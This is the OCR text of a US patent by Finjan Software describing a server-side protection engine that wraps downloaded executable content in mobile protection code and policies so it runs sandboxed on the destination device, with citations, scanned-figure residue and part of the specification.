`US007613926B2
`
`c12) United States Patent
`Edery et al.
`
`(10) Patent No.:
`(45) Date of Patent:
`
`US 7,613,926 B2
`*Nov. 3, 2009
`
`(75)
`
`(54) METHOD AND SYSTEM FOR PROTECTING
`A COMPUTER AND A NETWORK FROM
`HOSTILE DOWNLOADABLES
`Inventors: Yigal Mordechai Edery, Pardesia (IL);
`Nimrod Itzhak Vered, Goosh Tel-Mond
`(IL); David R. Kroll, San Jose, CA
`(US); Shlomo Touboul, Kefar-Haim (IL)
`(73) Assignee: Finjan Software, Ltd, Netanya (IL)
`( *) Notice:
`Subject to any disclaimer, the term of this
`patent is extended or adjusted under 35
`U.S.C. 154(b) by 659 days.
`This patent is subject to a terminal dis(cid:173)
`claimer.
`(21) Appl. No.: 11/370,114
`Mar. 7, 2006
`(22) Filed:
`Prior Publication Data
`(65)
`
`Jul. 6, 2006
`US 2006/0149968 Al
`Related U.S. Application Data
`
`Continuation of application No. 09/861,229, filed on
`May 17, 2001, now Pat. No. 7,058,822, and a continu(cid:173)
`ation-in-part of application No. 09/539,667, filed on
`Mar. 30, 2000, now Pat. No. 6,804,780, which is a
`continuation of application No. 08/964,388, filed on
`Nov. 6, 1997, now Pat. No. 6,092,194, said application
`No. 09/861,229 is a continuation-in-part of application
`No. 09/551,302, filed on Apr. 18,2000, now Pat. No.
`6,480,962.
`Provisional application No. 60/205,591, filed on May
`17,2000.
`Int. Cl.
`(2006.01)
`G06F 21124
`(2006.01)
`G06F 11130
`H04L 9100
`(2006.01)
`(2006.01)
`G06F 15116
`U.S. Cl. ....................... 713/181; 713/175; 713/176;
`726/24
`Field of Classification Search ....................... None
`See application file for complete search history.
`
`References Cited
`
`U.S. PATENT DOCUMENTS
`
`(63)
`
`(60)
`
`(51)
`
`(52)
`
`(58)
`
`(56)
`
`5,359,659 A
`
`10/1994 Rosenthal .................... 726/24
`
`(Continued)
`
`FOREIGN PATENT DOCUMENTS
`
`EP
`EP
`
`1091276
`1132796
`
`4/2001
`9/2001
`
`OTHER PUBLICATIONS
`
`Zhong, eta!., "Security in the Large: is Java's Sandbox Scalable?,"
`Seventh IEEE Symposium on Reliable Distributed Systems, pp. 1-6,
`Oct. 1998.
`
`(Continued)
`
`Primary Examiner-Christopher A Revak
`(74) Attorney, Agent, or Firm-King & Spalding LLP
`
`(57)
`
`ABSTRACT
`
`Protection systems and methods provide for protecting one or
`more personal computers ("PCs") and/or other intermittently
`or persistently network accessible devices or processes from
`undesirable or otherwise malicious operations of Java™
`applets, ActiveX™ controls, JavaScript™ scripts, Visual
`Basic scripts, add-ins, downloaded/uploaded programs or
`other "Downloadables" or "mobile code" in whole or part. A
`protection engine embodiment provides, within a server, fire(cid:173)
`wall or other suitable "re-communicator," for monitoring
`information received by the communicator, determining
`whether received information does or is likely to include
`executable code, and if so, causes mobile protection code
`(MPC) to be transferred to and rendered operable within a
`destination device of the received information, more suitably
`by forming a protection agent including the MPC, protection
`policies and a detected-Downloadable. An MPC embodiment
`further provides, within a Downloadable-destination, for ini(cid:173)
`tiating the Downloadable, enabling malicious Downloadable
`operation attempts to be received by the MPC, and causing
`(predetermined) corresponding operations to be executed in
`response to the attempts, more suitably in conjunction with
`protection policies.
`
`5,077,677 A
`
`12/1991 Murphy eta!. ................ 706/62
`
`30 Claims, 10 Drawing Sheets
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`US 7,613,926 B2
`Page 2
`
`U.S. PATENT DOCUMENTS
`
`1111994 Tajalli eta!. .................. 726/23
`5,361,359 A
`5/1995 Hershey et a!.
`5,414,833 A
`............... 726/22
`111996 Gupta eta!.
`.................. 726/25
`5,485,409 A
`5,485,575 A
`111996 Chess eta!. ................... 714/38
`1111996 Judson ....................... 709/218
`5,572,643 A
`5,579,509 A
`1111996 Furtney et al. ................ 703/27
`2/1997 Shwed ........................ 726/13
`5,606,668 A *
`5,623,600 A *
`4/1997 Ji eta!. ......................... 726/24
`6/1997 Rubin ......................... 705/51
`5,638,446 A
`10/1997 Kephart et a!. ................ 706/12
`5,675,711 A
`1111997 McManis .................... 713/167
`5,692,047 A
`5,692,124 A
`1111997 Holden et al ................... 726/2
`2/1998 Deo .............................. 726/2
`5,720,033 A
`3/1998 Chang et al . .................. 705/52
`5,724,425 A
`4/1998 Fieres eta!.
`................ 713/156
`5,740,248 A
`4/1998 Yellin et al .................. 717/134
`5,740,441 A
`............ 709/223
`6/1998 van Hoff et a!.
`5,761,421 A
`6/1998 Breslau et a!.
`5,765,205 A
`.............. 7111203
`7/1998 Devarakonda et a!.
`...... 713/165
`5,784,459 A
`8/1998 Davis et al . ................. 709/224
`5,796,952 A
`9/1998 Cohen et al . ................ 709/202
`5,805,829 A
`1111998 Chen et a!. .................... 726/24
`5,832,208 A
`1111998 Cutler eta!. ................ 717/171
`5,832,274 A
`12/1998 Angelo et al ................ 713/320
`5,850,559 A
`5,859,966 A
`111999 Hayman et a!.
`............... 726/23
`111999 Boebert et a!. .............. 709/249
`5,864,683 A
`3/1999 Yamamoto ................... 726/24
`5,881,151 A
`3/1999 Duvall eta!. ................ 709/206
`5,884,033 A
`4/1999 Atkinson et al . .............. 726/22
`5,892,904 A
`9/1999 Chen et a!. .................... 714/38
`5,951,698 A
`9/1999 Walsh eta!. .................. 726/23
`5,956,481 A
`10/1999 Williams .................... 717/143
`5,963,742 A
`10/1999 Golan
`5,974,549 A
`1111999 Apperson et a!.
`5,978,484 A
`1111999 Ji
`5,983,348 A
`1111999 Freund .......................... 726/4
`5,987,611 A
`7/2000 Grecsek ......................... 726/1
`6,088,801 A
`7/2000 Tso et al. ...................... 726/22
`6,088,803 A
`7/2000 Touboul ...................... 726/24
`6,092,194 A *
`6,154,844 A * 1112000 Touboul et a!.
`............... 726/24
`6,167,520 A
`12/2000 Touboul
`6,339,829 Bl
`112002 Beadle eta!. ................. 726/15
`6,425,058 Bl
`7/2002 Arimilli et a!. .............. 7111134
`6,434,668 Bl
`8/2002 Arimilli eta!. .............. 7111128
`6,434,669 Bl
`8/2002 Arimilli eta!. .............. 7111128
`6,480,962 Bl* 1112002 Touboul ...................... 726/22
`6,487,666 Bl
`1112002 Shanklin et a!. ............... 726/23
`.......... 7111114
`2/2003 Devireddy et a!.
`6,519,679 B2
`6,598,033 B2
`7/2003 Ross eta!. .................... 706/46
`6,732,179 Bl*
`5/2004 Brown eta!. ................ 709/229
`6,804,780 Bl* 10/2004 Touboul
`..................... 713/181
`6,901,519 Bl*
`5/2005 Stewart et a!.
`................ 726/24
`7/2005 Simonet al . ................ 707/204
`6,917,953 B2
`7,058,822 B2 *
`6/2006 Edery eta!. ................... 726/22
`7,093,135 Bl*
`8/2006 Radatti et a!. ............... 713/188
`7,210,041 Bl
`4/2007 Gryaznov et a!.
`........... 713/188
`3/2008 Grabarnik et al . ........... 719/313
`7,343,604 B2
`8/2008 Touboul ...................... 726/22
`7,418,731 B2
`4/2004 Sanin .......................... 726113
`2004/0073811 AI
`2004/0088425 AI
`5/2004 Rubinstein et a!. .......... 709/230
`2005/0172338 AI
`8/2005 Sandu eta!. .................. 726/22
`2/2006 Bj arnestam et a!. ............ 707/3
`2006/0031207 AI
`
`............. 705/54
`
`OTHER PUBLICATIONS
`
`Rubin, eta!., "Mobile Code Security," IEEE Internet, pp. 30-34, Dec.
`1998.Schmid, et al. "Protecting Data From Malicious Software,"
`
`Proceedings of the 181h Annual Computer Security Applications Con(cid:173)
`ference, pp. 1-10, 2002.
`Corradi, et al., "A Flexible Access Control Service for Java Mobile
`Code," IEEE, pp. 356-365, 2000.
`
`International Search Report for Application No. PCT /IB97 /01626, 3
`pp., May 14, 1998 (mailing date).
`International Search Report for Application No. PCT/IL05/00915, 4
`pp., dated Mar. 3, 2006.
`Written Opinion for Application no. PCT/IL05/00915, 5 pp., dated
`Mar. 3, 2006 (mailing date) .
`International Search Report for Application No. PCT /IBO 1101138, 4
`pp., Sep. 20, 2002 (mailing date).
`International Preliminary Examination Report for Application No.
`PCT/IBO 1101138, 2 pp., dated Dec. 19, 2002.
`Gerzic, Amer, "Write Your Own Regular Expression Parser," Nov.
`17, 2003, 18 pp.
`Power, James, "Lexical Analysis," 4 pp., May 14, 2006.
`Sitaker, Kragen, "Rapid Genetic Evolution of Regular Expressions"
`[online], The Mia! Archive, Apr. 24, 2004 (retrieved on Dec. 7, 2004),
`5 pp.
`"Lexical Analysis: DFA Minimization & Wrap Up" [online], Fall,
`2004 [retrieved on Mar. 2, 2005], 8 pp.
`"Minimization ofDFA" [online], [retrieved on Dec. 7, 2004], 7 pp.
`"Algorithm: NFS -> DFA" [online], Copyright 1999-2001 [retrieved
`on Dec. 7, 2004], 4 pp.
`"CS 3813: Introduction to Formal Languages and Automata-State
`Minimization and Other Algorithms for Finite Automata," 3 pp., May
`11, 2003.
`Watson, Bruce W., "Constructing Minimal Acyclic Deterministic
`Finite Automata," [retrieved on Mar. 20, 2005], 38 pp.
`Chang, Chia-Hsiang, "From Regular Expressions to DFA's Using
`Compressed NFA's," Oct. 1992, 243 pp.
`"Products," Articles published on the Internet, "Revolutionary Secu(cid:173)
`rity for a New Computing Paradigm" regarding SurfinGate™, 7 pp.
`"Release Notes for the Microsoft ActiveX Development Kit," Aug.
`13, 1996, pp. 1-10.
`Doyle, et al., "Microsoft Press Computer Dictionary," Microsoft
`Press, 2d Edition, pp. 137-138, 1993.
`Finjan Software Ltd., "Powerful PC Security for the New World of
`Java™ and Downloadables, Surfin Shield™," Article published on
`the Internet by Fin jan Software Ltd., 2 pp. 1996.
`Finjan Sofrtware Ltd., "FinjanAnnounces a Personal Java™ Firewall
`for Web Browsers-the SurfinShield™ 1.6 (formerly known as
`SurfinBoard)," Press Release of Finjan Releases SurfinShield 1.6, 2
`pp., Oct. 21, 1996 .
`Finjan Software Ltd., "Finjan Announces Major Power Boost and
`New Features for SurfinShield™ 2.0," Las Vegas Convention Center/
`Pavillion 5 P5551, 3 pp., Nov. 18, 1996 .
`Finjan Software Ltd., "Finjan Software Releases SurfinBoard, Indus(cid:173)
`try's First JAVA Security Product for the World Wide Web," Article
`published on the Internet by Finjan Software Ltd., 1 p., Jul. 29, 1996.
`Finjan Software Ltd., "Java Security: Issues & Solutions," Article
`published on the Internet by Fin jan Software Ltd., 8 pp. 1996.
`Finjan Software Ltd., Company Profile, "Fin jan-Safe Surfing, The
`Java Security Solutions Provider," Article published on the Internet
`by Finjan Software Ltd., 3 pp., Oct. 31, 1996.
`"IBM AntiVirus User's Guide, Version 2.4,", International Business
`Machines Corporation, pp. 6-7, Nov. 15, 1995.
`Khare, R., "Microsoft Authenticode Analyzed" [online], Jul. 22,
`1996 [retrieved on Jun. 25, 2003], 2 pp.
`LaDue, M., Online Business Consultant: Java Security: Whose Busi(cid:173)
`ness is It?, Article published on the Internet, Home Page Press, Inc.,
`4 pp., 1996.
`Leach, Norvin, eta!., "IE 3.0 Applets Will Earn Certification," PC
`Week, vol. 13, No. 29, 2 pp., Jul. 22, 1996.
`Moritz, R., "Why We Shouldn't Fear Java," Java Report, pp. 51-56,
`Feb. 1997.
`Microsoft, "Microsoft ActiveX Software Development Kit"
`[Online], Aug. 12, 1996 [retrieved on Jun. 25, 2003], pp. 1-6.
`Microsoft® Authenticode Technology, "Ensuring Accountability
`and Authenticity for Software Components on the Internet,"
`Microsoft Corporation, Oct. 1996, including Abstract, Contents,
`Introduction, and pp. 1-10.
`Microsoft Corporation, Web Page Article "Frequently Asked Ques(cid:173)
`tions About Authenticode," last updated Feb. 17, 1997, printed Dec.
`23, 1998, pp. 1-13.
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`US 7,613,926 B2
`Page 3
`
`Okamoto, E., eta!., "ID-BasedAuthentication System for Computer
`Virus Detection," IEEEIIEE Electronic Library online, Electronics
`Letters, vol. 26, Issue 15, ISSN 0013-5194, Jul. 19, 1990, Abstract
`andpp.1169-1170.
`Omura, J. K., "Novel Applications of Cryptography in Digital Com(cid:173)
`munications," IEEE Communications Magazine, pp. 21-29, May
`1990.
`
`Schmitt, D.A., ".EXE files, OS-2 style," PC Tech Journal, vol. 6, No.
`11, p. 76(13), Nov. 1988.
`Zhang, X. N., "Secure Code Distribution," IEEEIIEE Electronic
`Library online, Computer, vol. 30, Issue 6, pp. 76-79, Jun. 1997.
`D. Grune, eta!., "Parsing Techniques: A Practical Guide," John Wiley
`& Sons, Inc., New York, New York, USA, pp. 1-326,2000.
`* cited by examiner
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`U.S. Patent
`
`Nov. 3, 2009
`
`Sheet 1 of 10
`
`US 7,613,926 B2
`
`100
`~
`
`Redundancy Support
`
`Subsystem-1
`(Sandbox Protected)
`
`Subsystem-N
`(Unprotected)
`
`Subsystem-M
`(Protected)
`
`104a
`\__._
`
`ISP-Server
`
`Server
`
`Protection Engine
`(PE)
`
`142a
`
`~--
`I MPC,D
`! t
`!
`r·-------- --l
`145a
`~ User
`l Device-n
`
`145
`
`FIG. la
`
`104b
`\__._
`
`140a
`
`Corporate Server
`
`143
`
`FIG. lb
`
`FIG. lc
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`200
`
`~
`
`(202
`
`(203
`
`1 2o4
`
`Processor( s)
`
`Input Device(s)
`
`Output Device(s)
`
`206
`
`I
`
`Computer Readable
`Storage Medium
`
`..
`/"' 05
`Computer Readable
`Storage Medium Reader
`
`201\
`
`r2o1
`Communications
`Interface
`
`r 2os
`
`Storage
`
`/209
`
`Working Memory
`
`I Operating System r 291
`I Other Programs r 292
`
`FIG. 2
`
`~
`00 .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`('D
`('D
`
`rFJ =(cid:173)
`.....
`N
`0 .....
`....
`0
`
`d
`rJl
`-....l
`0..,
`""""' w
`\c
`N
`
`0'1 = N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`300
`~
`
`Not
`331 ~ Executable
`
`301
`
`Server
`
`302
`
`Firewall
`
`310
`
`Protection
`Engine (PE)
`
`'..,,
`\
`\
`'
`I
`o
`I
`I
`I
`
`l'
`,'
`,
`'
`
`I
`I
`I
`I
`I
`
`. .
`...... L .. t ...
`I l (PE)
`I . I
`
`Received
`Infonnation
`
`(Non .. Executable/
`Executable Info)
`
`320
`
`~
`00 .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`rFJ =(cid:173)
`.....
`
`('D
`('D
`
`(H
`
`0 .....
`.....
`0
`
`d
`rJl
`-....l
`0..,
`""'"" w
`\c
`N
`
`0'1 = N
`
`~--------------i
`
`I
`
`I
`I
`
`I
`
`I
`I
`
`t __________ .., __
`"~-----
`- - - - · :
`
`34l~i
`343 ~ XEQ II
`342 --f-r·poL·! !
`(1 1
`..
`340
`
`_ _)
`
`y
`303
`
`FIG. 3
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`400
`
`~
`
`l
`
`----------------------------------------------
`
`I r - -
`4~8 -
`- - -.
`- -
`~ :
`Security/
`:
`Authentication ~---
`1
`1
`1
`
`Policies
`
`Deremioo ~~~;=--------------~~:------~~~--~ :?: 1-~~~~ 1
`
`Not Executable
`(NXEQ)
`
`_j ~ -
`-
`:
`-
`-
`:_ _J.
`I
`Policy/
`111--+------.J..:.. Authentication I
`1-
`Reader· ~ --
`'--T-----------l
`~-~~:_e~_:
`403
`
`431
`
`432
`433
`
`t +
`
`Transfer
`Engine
`
`..
`
`406
`
`I 4fs I
`
`I
`I
`
`I
`I
`
`404
`-......s-
`
`Storage
`
`Protected Package Engine
`
`FIG. 4
`
`401
`
`~/
`
`....._
`
`-NXEQ
`
`XEQ
`
`Information
`Monitor
`
`u : rL
`
`-
`)v- J
`
`407
`
`User, policy, interfacing
`or other information
`
`~
`00 .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`rFJ =-('D
`.....
`
`('D
`
`.j;o.
`
`0 .....
`....
`0
`
`d
`rJl
`-....l
`0..,
`""""' w
`\c
`N
`
`0'1 = N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`504
`
`421
`
`~
`
`-
`
`I Control I
`I
`
`To Trans
`Engine
`
`0 Agent
`To Linking Generator
`Engine
`
`.__
`- ~ m
`
`506 i -
`'-!\, - L - - -- _, c,,,.,-;-;._- L_,
`I Detector
`-
`111-s-:---~
`I • ---
`1nary
`1
`1 I Detector ~~
`I I Pattern I
`551 505
`: Detector-~
`1 1 Other ·t _ 552
`-'-----~~
`FIG. 5
`
`r -
`
`- _
`
`Parser
`
`-
`
`553
`
`601 {
`
`602 { ' - .
`
`FIG. 6a
`
`405
`
`~
`
`FIG. 6b
`
`~
`00 .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`('D
`('D
`
`rFJ =(cid:173)
`.....
`Ul
`0 .....
`....
`0
`
`d
`rJl
`--..1
`0..,
`""""' w
`\c
`N
`
`0'1 = N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`U.S. Patent
`
`Nov. 3, 2009
`
`Sheet 6 of 10
`
`US 7,613,926 B2
`
`700
`~
`
`340
`···---~---------,
`l Protection
`l
`!
`Agent
`1
`L ............... .._ .......................... :
`
`701
`
`702
`
`Memory Space-N
`
`FIG. 7a
`
`704
`
`703
`
`341
`~
`
`Memory Space-P1
`342
`
`341
`
`FIG. 7b
`
`Package Extractor
`
`Executable installer
`
`Sandbox Engine Installer
`
`Resource Access Diverter
`
`Resource Access Analyzer
`
`Policy Enforcer
`
`MPC De-Installer
`
`FIG. 8
`
`801
`802
`803
`804
`805
`806
`807
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`Monitor re-communicator (e.g. server)
`operation
`
`Receive Information· having-a protected
`information destination
`(a "potential-Downloadable"
`
`901
`
`903
`
`L~~~~~~-~~~~~I~~~~~~~~~:~~~~~-~~~I~~~~~~:~~::~rv 905
`
`913
`
`919
`
`921
`
`915
`
`No
`
`Form a protection agent corresp to mobile
`protection code, potential-Downloadable
`(now a detected-Downloadable)+ any
`protection policies
`
`Cause the protection agent to be delivered
`to the information-Destination
`
`909
`;-·····················•···········-·-········:
`Prevent current delivery VV
`i
`
`::::~~::::::::::~:::1:::::::::::::::::::::::::
`L.~~~~~-~~~:-~~~~~-~~-~!~~-~~~~!. .. rv
`cp 0<-
`
`911
`
`Cause potential-Downloadable
`to be delivered to the
`information-destination
`
`FIG. 9
`
`~
`7J). .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`('D
`('D
`
`rFJ =(cid:173)
`.....
`-....l
`0 .....
`....
`0
`
`d
`rJl
`-....l
`'0-,
`""""' w
`\c
`N
`
`0'1 = N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`913
`~
`
`919
`~
`
`Start
`
`Determine whether the potential(cid:173)
`Downloadable indicates an executable
`file type
`
`Determine whether the file contents
`include binary information or code patterns
`
`If steps1001 and 1003 indicate that the
`potential-Downloadable more likely
`includes executable code,
`consider the potential-Downloadable a
`detected-Downloadable
`
`1001
`
`1003
`
`1005
`
`Retrieve protection parameters and form
`mobile protection code according to the
`parameters
`
`1011
`
`Retrieve protection parameters and form
`protection policies according to the
`parameters
`
`Couple the mobile protection code,
`protection policies and received(cid:173)
`information to form a protection agent (e.g.
`MPC first, policies second, and Rl third)
`
`1015
`
`End
`
`FIG. lOA
`
`FIG. lOB
`
`~
`00 .
`
`~
`~
`~
`
`~ = ~
`
`z 0
`
`~
`~(H
`N
`0
`0
`\0
`
`rFJ =-('D
`
`('D
`......
`QO
`
`0 ......
`......
`0
`
`d
`rJl
`-....l
`'0-,
`""""' w
`\c
`N
`
`0'1 = N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`U.S. Patent
`
`Nov. 3, 2009
`
`Sheet 9 of 10
`
`US 7,613,926 B2
`
`1101
`
`1102
`
`1103
`
`Install mobile protection code elements
`and policies within a destination device
`
`Load the downloadble without actually
`initiating it
`
`'
`
`Form an access interceptor for intercepting
`downloadable destination device access
`attempts within the destination device
`
`Initiate the Downloadable within the
`destination device
`
`No
`
`Determine policies in accordance with the
`access attempt
`
`Execute the policies (including causing an
`allowable response expected by the
`Donwloadable to be returned to the
`Downloadable)
`
`End
`
`FIG. 11
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`1103
`~
`
`(
`
`Start )
`
`Install the Downloadable
`
`1201
`vv
`
`Modify the Downloadable API to divert ~203
`malicious access requests to the mobile
`protection code
`
`FIG. 12a
`
`1109
`~
`
`(
`
`Start
`
`)
`
`Receive a Downloadable access request
`via the modified API
`
`'
`
`1211
`
`Query stored policies to determine a policy ~ 213
`corresponding to the Downloadable
`access request
`
`FIG. 12b
`
`~
`.
`00
`
`~
`~
`~
`~
`
`=
`
`~
`
`z
`0
`~
`~(H
`N
`0
`0
`\0
`
`('D
`
`rFJ =-('D
`.....
`....
`0
`0 .....
`....
`0
`
`d
`rJl
`-....l
`0..,
`""""' w
`\c
`N
`0'1
`
`= N
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`US 7,613,926 B2
`
`1
`METHOD AND SYSTEM FOR PROTECTING
`A COMPUTER AND A NETWORK FROM
`HOSTILE DOWNLOADABLES
`
`PRIORITY REFERENCE TO RELATED
`APPLICATIONS
`
`2
`information comprising program code can include distribut(cid:173)
`able components (e.g. Java™ applets and JavaScript scripts,
`ActiveX™ controls, Visual Basic, add-ins and/or others). It
`can also include, for example, application programs, Trojan
`horses, multiple compressed programs such as zip or meta
`files, among others. U.S. Pat. No. 5,983,348 to Shuang, how(cid:173)
`ever, teaches a protection system for protecting against only
`distributable components including "Java applets or ActiveX
`controls", and further does so using resource intensive and
`10 high bandwidth static Downloadable content and operational
`analysis, and modification of the Downloadable component;
`Shuang further fails to detect or protect against additional
`program code included within a tested Downloadable. U.S.
`Pat. No. 5,974,549 to Golan teaches a protection system that
`15 further focuses only on protecting against ActiveX controls
`and not other distributable components, let alone other
`Downloadable types. U.S. Pat. No. 6,167,520 to Touboul
`enables more accurate protection than Shuang or Golan, but
`lacks the greater flexibility and efficiency taught herein, as do
`20 Shuang and Golan.
`Accordingly, there remains a need for efficient, accurate
`and flexible protection of computers and other network con(cid:173)
`nectable devices from malicious Downloadables.
`
`SUMMARY OF THE INVENTION
`
`This application is a continuation of assignee's application
`Ser. No. 09/861,229, filed on May 17, 2001,nowU.S. Pat. No.
`7,058,822, entitled "Malicious Mobile Code Runtime Moni(cid:173)
`toring System And Methods", which is hereby incorporated
`by reference. U.S. application Ser. No. 09/861,229 claims
`benefit of provisional application Ser. No. 60/205,591,
`entitled "Computer Network Malicious Code Run-time
`Monitoring," filed on May 17, 2000 by inventors Nimrod
`Itzhak Vered, et a!., which is hereby incorporated by refer(cid:173)
`ence. U.S. application Ser. No. 09/861,229 is also a Continu(cid:173)
`ation-In-Part ofU.S. patent application Ser. No. 09/539,667,
`entitled "System and Method for Protecting a Computer and
`a Network From Hostile Downloadables" filed on Mar. 30,
`2000 by inventor Shlomo Touboul, now U.S. Pat. No. 6,804,
`780, and hereby incorporated by reference, which is a con(cid:173)
`tinuation of assignee's patent application U.S. Ser. No.
`08/964,388, filed on Nov. 6, 1997, now U.S. Pat. No. 6,092,
`194, also entitled "System and Method for Protecting a Com- 25
`puter and a Network from Hostile Downloadables" and
`hereby incorporated by reference. U.S. Ser. No. 09/861,229 is
`also a Continuation-In-Part of U.S. patent application Ser.
`No. 09/551,302, entitled "System and Method for Protecting
`a Client During Runtime From Hostile Downloadables", filed 30
`on Apr. 18, 2000 by inventor Shlomo Touboul, now U.S. Pat.
`No. 6,480,962, which is hereby incorporated by reference.
`
`BACKGROUND OF THE INVENTION
`
`1. Field of the Invention
`This invention relates generally to computer networks, and
`more particularly provides a system and methods for protect(cid:173)
`ing network-connectable devices from undesirable down(cid:173)
`loadable operation.
`2. Description of the Background Art
`Advances in networking technology continue to impact an
`increasing number and diversity of users. The Internet, for
`example, already provides to expert, intermediate and even
`novice users the informational, product and service resources
`of over 100,000 interconnected networks owned by govern(cid:173)
`ments, universities, nonprofit groups, companies, etc. Unfor(cid:173)
`tunately, particularly the Internet and other public networks
`have also become a major source of potentially system-fatal
`or otherwise damaging computer code commonly referred to
`as "viruses."
`Efforts to forestall viruses from attacking networked com(cid:173)
`puters have thus far met with only limited success at best.
`Typically, a virus protection program designed to identify and
`remove or protect against the initiating of known viruses is
`installed on a network firewall or individually networked
`computer. The program is then inevitably surmounted by
`some new virus that often causes damage to one or more
`computers. The damage is then assessed and, if isolated, the
`new virus is analyzed. A corresponding new virus protection 60
`program (or update thereof) is then developed and installed to
`combat the new virus, and the new program operates success(cid:173)
`fully until yet another new virus appears-and so on. Of
`course, damage has already typically been incurred.
`To make matters worse, certain classes of viruses are not 65
`well recognized or understood, let alone protected against. It
`is observed by this inventor, for example, that Downloadable
`
`The present invention provides protection systems and
`methods capable of Protecting a personal computer ("PC") or
`other persistently or even intermittently network accessible
`devices or processes from harmful, undesirable, suspicious or
`other "malicious" operations that might otherwise be effec-
`tuated by remotely operable code. While enabling the capa(cid:173)
`bilities of prior systems, the present invention is not nearly so
`limited, resource intensive or inflexible, and yet enables more
`35 reliable protection. For example, remotely operable code that
`is protectable against can include downloadable application
`programs, Trojan horses and program code groupings, as well
`as software "components", such as Java™ applets,
`ActiveX™ controls, JavaScript™Nisual Basic scripts, add-
`40 ins, etc., among others. Protection can also be provided in a
`distributed interactively, automatically or mixed configurable
`manner using protected client, server or other parameters,
`redirection, local/remote logging, etc., and other server/client
`based protection measures can also be separately and/or
`45 interoperably utilized, among other examples.
`In one aspect, embodiments of the invention provide for
`determining, within one or more network "servers" (e.g. fire(cid:173)
`walls, resources, gateways, email relays or other devices/
`processes that are capable of receiving-and-transferring a
`50 Downloadable) whether received
`information
`includes
`executable code (and is a "Downloadable"). Embodiments
`also provide for delivering static, configurable and/or exten(cid:173)
`sible remotely operable protection policies to a Download(cid:173)
`able-destination, more typically as a sandboxed package
`55 including the mobile protection code, downloadable policies
`and one or more received Downloadables. Further client-
`based or remote protection code/policies can also be utilized
`in a distributed manner. Embodiments also provide for caus(cid:173)
`ing the mobile protection code to be executed within a Down(cid:173)
`loadable-destination in a manner that enables various Down(cid:173)
`loadable operations to be detected, intercepted or further
`responded to via protection operations. Additional server/
`information-destination device security or other protection is
`also enabled, among still further aspects.
`A protection engine according to an embodiment of the
`invention is operable within one or more network servers,
`firewalls or other network connectable information re-com-
`
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
`US 7,613,926 B2
`
`4
`tor" for enabling further up/downloading of one or more
`further "modules" or other information (e.g. events, user/user
`device information, etc.).
`Another method according to an embodiment of the inven(cid:173)
`tion includes installing, within a user device, received mobile
`protection code ("MPC") and protection policies in conjunc(cid:173)
`tion with the user device receiving a downloadable applica(cid:173)
`tion program, component or other Downloadable(s). The
`method also includes determining, by the MPC, a resource
`access attempt by the Downloadable, and initiating, by the
`MPC, one or more predetermined operations corresponding
`to the attempt. (Predetermined operations can, for example,
`comprise initiating user, administrator, client, network or pro(cid:173)
`tection system determinable operations, including but not
`15 limited to modifying the Downloadable operation, extricating
`the Downloadable, notifying a user/another, maintaining a
`local/remote log, causing one or more MPCs/policies to be
`downloaded, etc.)
`Advantageously, systems and methods according to
`20 embodiments of the invention enable potentially damaging,
`undesirable or otherwise malicious operations by even
`unknown mobile code to be detected, prevented, modified
`and/or otherwise protected against without modifying the
`mobile code. Such protection is further enabled in a mauner
`25 that is capable of minimizing server and client resource
`requirements, does not require pre-installation of security
`code within a Downloadable-destination, and provides for
`client specific or generic and readily updateable security mea(cid:173)
`sures to be flexibly and efficiently implemented. Embodi-
`30 ments further provide for thwarting efforts to bypass security
`measures (e.g. by "hiding" undesirable operation causing
`information within apparently inert or otherwise "friendly"
`downloadable information) and/or dividing or combining
`security measures for even greater flexibility and/or effi-
`35 ciency.
`Embodiments also provide for determining protection
`policies that can be downloaded and/or ascertained from
`other security information (e.g. browser settings, administra(cid:173)
`tive policies, user input, uploaded information, etc.). Differ-
`40 ent actions in response to different Downloadable operations,
`clients, users and/or other criteria are also enabled, and
`embodiments provide for implementing other security mea(cid:173)
`sures, such as verifying a downloadable source, certification,
`authentication, etc. Appropriate action can also be accom-
`45 plished automatically (e.g. programmatically) and/or in con(cid:173)
`junction with alerting one or more users/administrators, uti(cid:173)
`lizing user input, etc. Embodiments further enable desirable
`Downloadable operations to remain substantially unaffected,
`among other aspects.
`
`50
`
`3
`municating devices (as are referred to herein summarily one
`or more "servers" or "re-communicators"). The protection
`engine includes an information monitor for monitoring infor(cid:173)
`mation received by the server, and a code detection engine for
`determining whether the received information includes
`executable code. The protection engine also includes a pack(cid:173)
`aging engine for causing a sandboxed package, typically
`including mobile protection code and downloadable protec(cid:173)
`tion policies to be sent to a Downloadable-destination in
`conjunction with the received information, if the received 10
`information is determined to be a Downloadable.
`A sandboxed package according to an embodiment of the
`invention is receivable by and operable with a remote Down(cid:173)
`loadable-destination. The sandboxed package
`includes
`mobile protection code ("MPC") for causing one or more
`predetermined malicious operations or operation combina(cid:173)
`tions of a Downloadable to be monitored or otherwise inter(cid:173)
`cepted. The sandboxed package also includes protection poli(cid:173)
`cies (operable alone or
`in conjunction with further
`Downloadable-destination stored or received policies/MPCs)
`for causing one or more predetermined operations to be per(cid:173)
`formed if one or more undesirable operations of the Down(cid:173)
`loadable is/are intercepted. The sandboxed package can also
`include a corresponding Downloadable and can provide for
`initiating the Downloadable in a protective "sandbox". The
`MPC/policies can further include a communicator for
`enabling further MPC/policy information or "modules" to be
